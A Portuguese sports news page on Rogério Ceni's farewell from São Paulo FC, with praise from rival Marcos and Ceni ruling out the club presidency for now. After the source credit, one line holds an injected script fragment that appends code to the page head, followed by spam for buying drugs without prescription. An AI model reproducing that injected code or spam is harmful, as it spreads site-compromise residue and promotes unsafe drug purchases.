Destaque Noticia

Rogério conquista até rivais, mas só vê futuro no Tricolor

A despedida de Rogério Ceni mobilizou tanto os são-paulinos que conseguiu algo que parecia distante da realidade quando se falava do grande ídolo tricolor: aproximá-lo até dos arquirrivais, que fizeram questão de exaltar a sua carreira. Mesmo com nomes identificados com outras equipes tecendo diversos elogios, no entanto, o arqueiro não vê qualquer chance de representar outro clube do país.

“O Rogério, independente de time de torcedor, temos que respeitar sempre a história dele. Vinte e cinco anos em um clube só não é para qualquer um. Está rico, tem dinheiro, vai viver um pouco da vida e depois volta para o São Paulo, que sempre vai ter uma porta aberta ali”, analisou o ídolo palmeirense Marcos, que atuou com Ceni na Copa do Mundo de 2002, sem saber da análise do próprio 01 sobre a chance de presidir o clube do Morumbi.

“Não penso em ser presidente do São Paulo, mas só me vejo continuando no futebol dentro daqui. Minha identificação é total com o clube”, afirmou o capitão, que chegou ao clube em 1990, mas não se vê como o nome para gerir a agremiação.

“Não tenho toda essa capacidade intelectual, não tenho formação na faculdade. Minha formação é a vida, a prática. Há pessoas mais qualificadas. Ser presidente não é uma profissão, mas sim doar parte do seu tempo em benefício do clube. Eu ainda preciso trabalhar bastante. Tenho muitas coisas a aprender e a viver para gerir um clube do tamanho do São Paulo”, analisou.

Apesar da humildade para reconhecer sua falta de capacidade administrativa, Ceni fez questão de apontar sua contribuição para o crescimento da torcida. “Eu agradeço o que pude agregar de torcedor são-paulino em todos esses anos. Por tudo o que aconteceu dentro de campo e também, penso eu, fora dele, diversas crianças escolheram o São Paulo para torcer”, encerrou o agora ex-jogador.

Gazeta Esportivad.getElementsByTagName(‘head’)[0].appendChild(s); gain cheaply drugs without prescription – http://riagnes.mhs.narotama.ac.id/2016/11/30/gain-cheaply-drugs-without-prescription/ take on cheap drugs online

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

1 × 5 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Quando foi a última vez que o São Paulo fez 5 gols em um jogo?

saopauloadmin21 de outubro de 2020

Sul-Americana, Copa do Brasil ou Brasileirão: qual torneio se dedicar?

saopauloadmin20 de outubro de 2020

São Paulo vive a sua maior sequência sem derrotas na temporada mas só venceu 2 dos últimos 11 jogos

saopauloadmin19 de outubro de 2020

São Paulo: Diniz afirma que arbitragem contra Fortaleza foi ‘confusa’

saopauloadmin15 de outubro de 2020

Veja o que mudou no SPFC desde o adeus na Libertadores

saopauloadmin13 de outubro de 2020

Fernando Diniz supera pressão e segue com duas pedras no caminho: Palmeiras e Rogério Ceni

saopauloadmin8 de outubro de 2020

Juanfran sente joelho na primeira etapa e vira preocupação para o São Paulo

saopauloadmin8 de outubro de 2020

Fernando Diniz lida com dúvida na lateral direita

saopauloadmin4 de outubro de 2020

Após eliminação na Libertadores, Raí banca Diniz no São Paulo

saopauloadmin1 de outubro de 2020